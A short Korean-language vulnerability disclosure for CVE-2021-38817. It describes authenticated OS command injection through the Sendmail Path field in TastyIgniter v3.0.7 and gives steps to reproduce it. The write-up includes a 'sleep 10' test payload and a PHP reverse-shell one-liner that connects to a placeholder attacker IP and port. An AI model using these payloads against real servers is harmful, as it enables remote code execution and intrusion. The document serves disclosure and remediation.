
TastyIgniter v3.0.7의 Sendmail 경로 필드에서의 원격 OS 명령 주입
TastyIgniter v3.0.7 Sendmail 웹 파트에서의 인증된 원격 OS 명령 주입/원격 코드 실행 (CVE-2021-38817)
TastyIgniter v3.0.7 레스토랑 CMS의 Sendmail 구성 메뉴에 인증된 원격 OS 명령 주입 취약점이 존재합니다. Sendmail Path 매개변수가 적절히 삭제(sanitize)되지 않아, 필드에 채워진 /usr/sbin/sendmail -bs 명령어에 세미콜론과 추가 OS 명령어를 추가하여 임의 명령어를 주입할 수 있습니다.
/admin/settings/edit/mail/admin/settings/edit/mail로 이동합니다.Mail Protocol 드롭다운 메뉴에서 Sendmail을 선택합니다.SendMail Path 필드에 세미콜론과 임의 OS 명령어를 추가합니다. 예: /usr/sbin/sendmail -bs; sleep 10/usr/sbin/sendmail -bs; sleep 10/usr/sbin/sendmail -bs; php -r '$sock=fsockopen("[IP]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");'
Matt Kiely (HuskyHacks) 및 Mike Padrick (Fearless), 2021년 8월
CVE 할당: 2022년 10월 (ㅋㅋ)